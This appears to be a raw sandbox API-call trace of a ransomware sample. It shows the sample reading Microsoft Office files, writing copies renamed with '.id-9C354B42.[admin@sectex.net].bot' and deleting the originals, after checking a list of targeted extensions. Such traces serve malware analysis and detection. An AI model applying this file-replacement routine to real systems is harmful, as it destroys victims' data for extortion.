	[0140.659] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.659] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_06.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0140.660] GetLastError () returned 0x0
	[0140.660] ReadFile (in: hFile=0x388, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x1e58, lpOverlapped=0x0) returned 1
	[0140.662] WriteFile (in: hFile=0x3a4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x1e60, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x1e60, lpOverlapped=0x0) returned 1
	[0140.663] ReadFile (in: hFile=0x388, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.663] WriteFile (in: hFile=0x3a4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.663] SetEndOfFile (hFile=0x3a4) returned 1
	[0140.837] CloseHandle (hObject=0x3a4) returned 1
	[0140.837] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.837] SetEndOfFile (hFile=0x388) returned 1
	[0140.839] CloseHandle (hObject=0x388) returned 1
	[0140.840] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.914] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_06.mid")) returned 1
	[0140.981] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63
	[0140.981] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63
	[0140.981] lstrlenW (lpString=".doc") returned 4
	[0140.981] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.981] lstrlenW (lpString=".docx") returned 5
	[0140.981] lstrcmpiW (lpString1=".docx", lpString2="6.MID") returned -1
	[0140.981] lstrlenW (lpString=".pdf") returned 4
	[0140.981] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.981] lstrlenW (lpString=".xls") returned 4
	[0140.981] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.981] lstrlenW (lpString=".xlsx") returned 5
	[0140.981] lstrcmpiW (lpString1=".xlsx", lpString2="6.MID") returned -1
	[0140.982] lstrlenW (lpString=".ppt") returned 4
	[0140.982] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63
	[0140.982] lstrlenW (lpString=".zip") returned 4
	[0140.982] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.982] lstrlenW (lpString=".rar") returned 4
	[0140.982] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.982] lstrlenW (lpString=".bz2") returned 4
	[0140.982] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.982] lstrlenW (lpString=".7z") returned 3
	[0140.982] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63
	[0140.982] lstrlenW (lpString=".dbf") returned 4
	[0140.982] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63
	[0140.982] lstrlenW (lpString=".1cd") returned 4
	[0140.982] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63
	[0140.982] lstrlenW (lpString=".jpg") returned 4
	[0140.982] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63
	[0140.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63
	[0140.982] lstrlenW (lpString=".doc") returned 4
	[0140.982] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.982] lstrlenW (lpString=".docx") returned 5
	[0140.982] lstrcmpiW (lpString1=".docx", lpString2="6.MID") returned -1
	[0140.982] lstrlenW (lpString=".pdf") returned 4
	[0140.982] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.982] lstrlenW (lpString=".xls") returned 4
	[0140.982] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.982] lstrlenW (lpString=".xlsx") returned 5
	[0140.982] lstrcmpiW (lpString1=".xlsx", lpString2="6.MID") returned -1
	[0140.982] lstrlenW (lpString=".ppt") returned 4
	[0140.982] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63
	[0140.983] lstrlenW (lpString=".zip") returned 4
	[0140.983] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.983] lstrlenW (lpString=".rar") returned 4
	[0140.983] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.983] lstrlenW (lpString=".bz2") returned 4
	[0140.983] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.983] lstrlenW (lpString=".7z") returned 3
	[0140.983] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63
	[0140.983] lstrlenW (lpString=".dbf") returned 4
	[0140.983] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63
	[0140.983] lstrlenW (lpString=".1cd") returned 4
	[0140.983] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned 63
	[0140.983] lstrlenW (lpString=".jpg") returned 4
	[0140.983] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.983] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.983] lstrlenW (lpString="SWEST_01.MID") returned 12
	[0140.983] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0140.984] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=8501) returned 1
	[0140.984] CloseHandle (hObject=0x384) returned 1
	[0140.984] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid")) returned 0x20
	[0140.984] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.984] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0140.984] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.984] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.984] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0140.985] GetLastError () returned 0x0
	[0140.985] ReadFile (in: hFile=0x384, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x2135, lpOverlapped=0x0) returned 1
	[0140.995] WriteFile (in: hFile=0x3a8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x2140, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x2140, lpOverlapped=0x0) returned 1
	[0140.996] ReadFile (in: hFile=0x384, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.996] WriteFile (in: hFile=0x3a8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.996] SetEndOfFile (hFile=0x3a8) returned 1
	[0141.001] CloseHandle (hObject=0x3a8) returned 1
	[0141.002] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.002] SetEndOfFile (hFile=0x384) returned 1
	[0141.049] CloseHandle (hObject=0x384) returned 1
	[0141.049] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.050] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid")) returned 1
	[0141.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63
	[0141.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63
	[0141.050] lstrlenW (lpString=".doc") returned 4
	[0141.050] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0141.050] lstrlenW (lpString=".docx") returned 5
	[0141.050] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0141.050] lstrlenW (lpString=".pdf") returned 4
	[0141.050] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0141.050] lstrlenW (lpString=".xls") returned 4
	[0141.050] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0141.050] lstrlenW (lpString=".xlsx") returned 5
	[0141.050] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0141.050] lstrlenW (lpString=".ppt") returned 4
	[0141.050] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0141.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63
	[0141.050] lstrlenW (lpString=".zip") returned 4
	[0141.050] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0141.050] lstrlenW (lpString=".rar") returned 4
	[0141.051] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0141.051] lstrlenW (lpString=".bz2") returned 4
	[0141.051] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0141.051] lstrlenW (lpString=".7z") returned 3
	[0141.051] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0141.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63
	[0141.051] lstrlenW (lpString=".dbf") returned 4
	[0141.051] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0141.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63
	[0141.051] lstrlenW (lpString=".1cd") returned 4
	[0141.051] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0141.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63
	[0141.051] lstrlenW (lpString=".jpg") returned 4
	[0141.051] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0141.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63
	[0141.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63
	[0141.051] lstrlenW (lpString=".doc") returned 4
	[0141.051] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0141.051] lstrlenW (lpString=".docx") returned 5
	[0141.051] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0141.051] lstrlenW (lpString=".pdf") returned 4
	[0141.051] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0141.051] lstrlenW (lpString=".xls") returned 4
	[0141.051] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0141.051] lstrlenW (lpString=".xlsx") returned 5
	[0141.051] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0141.051] lstrlenW (lpString=".ppt") returned 4
	[0141.051] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0141.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63
	[0141.051] lstrlenW (lpString=".zip") returned 4
	[0141.051] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0141.051] lstrlenW (lpString=".rar") returned 4
	[0141.051] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0141.051] lstrlenW (lpString=".bz2") returned 4
	[0141.051] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0141.052] lstrlenW (lpString=".7z") returned 3
	[0141.052] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0141.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63
	[0141.052] lstrlenW (lpString=".dbf") returned 4
	[0141.052] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0141.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63
	[0141.052] lstrlenW (lpString=".1cd") returned 4
	[0141.052] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0141.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63
	[0141.052] lstrlenW (lpString=".jpg") returned 4
	[0141.052] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0141.052] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0141.052] lstrlenW (lpString="Angles.eftx") returned 11
	[0141.052] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\angles.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0141.348] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=27365) returned 1
	[0141.348] CloseHandle (hObject=0x3b4) returned 1
	[0141.348] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\angles.eftx")) returned 0x20
	[0141.361] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\angles.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.369] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\angles.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0141.384] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.384] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.384] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\angles.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0141.388] GetLastError () returned 0x0
	[0141.388] ReadFile (in: hFile=0x3b4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x6ae5, lpOverlapped=0x0) returned 1
	[0141.390] WriteFile (in: hFile=0x3ac, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x6af0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x6af0, lpOverlapped=0x0) returned 1
	[0141.392] ReadFile (in: hFile=0x3b4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.392] WriteFile (in: hFile=0x3ac, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0141.392] SetEndOfFile (hFile=0x3ac) returned 1
	[0141.392] CloseHandle (hObject=0x3ac) returned 1
	[0141.392] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.392] SetEndOfFile (hFile=0x3b4) returned 1
	[0141.394] CloseHandle (hObject=0x3b4) returned 1
	[0141.395] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.395] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\angles.eftx")) returned 1
	[0141.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78
	[0141.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78
	[0141.395] lstrlenW (lpString=".doc") returned 4
	[0141.395] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.395] lstrlenW (lpString=".docx") returned 5
	[0141.395] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.396] lstrlenW (lpString=".pdf") returned 4
	[0141.396] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.396] lstrlenW (lpString=".xls") returned 4
	[0141.396] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.396] lstrlenW (lpString=".xlsx") returned 5
	[0141.396] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.396] lstrlenW (lpString=".ppt") returned 4
	[0141.396] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78
	[0141.396] lstrlenW (lpString=".zip") returned 4
	[0141.396] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.396] lstrlenW (lpString=".rar") returned 4
	[0141.396] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.396] lstrlenW (lpString=".bz2") returned 4
	[0141.396] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.396] lstrlenW (lpString=".7z") returned 3
	[0141.396] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78
	[0141.396] lstrlenW (lpString=".dbf") returned 4
	[0141.396] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78
	[0141.396] lstrlenW (lpString=".1cd") returned 4
	[0141.396] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78
	[0141.396] lstrlenW (lpString=".jpg") returned 4
	[0141.396] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78
	[0141.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78
	[0141.396] lstrlenW (lpString=".doc") returned 4
	[0141.396] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.396] lstrlenW (lpString=".docx") returned 5
	[0141.396] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.396] lstrlenW (lpString=".pdf") returned 4
	[0141.396] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.397] lstrlenW (lpString=".xls") returned 4
	[0141.397] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.397] lstrlenW (lpString=".xlsx") returned 5
	[0141.397] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.397] lstrlenW (lpString=".ppt") returned 4
	[0141.397] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78
	[0141.397] lstrlenW (lpString=".zip") returned 4
	[0141.397] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.397] lstrlenW (lpString=".rar") returned 4
	[0141.397] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.397] lstrlenW (lpString=".bz2") returned 4
	[0141.397] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.397] lstrlenW (lpString=".7z") returned 3
	[0141.397] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78
	[0141.397] lstrlenW (lpString=".dbf") returned 4
	[0141.397] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78
	[0141.397] lstrlenW (lpString=".1cd") returned 4
	[0141.397] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx") returned 78
	[0141.397] lstrlenW (lpString=".jpg") returned 4
	[0141.397] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.397] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0141.397] lstrlenW (lpString="Composite.eftx") returned 14
	[0141.397] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\composite.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0141.492] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=533988) returned 1
	[0141.492] CloseHandle (hObject=0x3a8) returned 1
	[0141.492] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\composite.eftx")) returned 0x20
	[0141.587] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\composite.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.627] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\composite.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0141.632] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.632] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
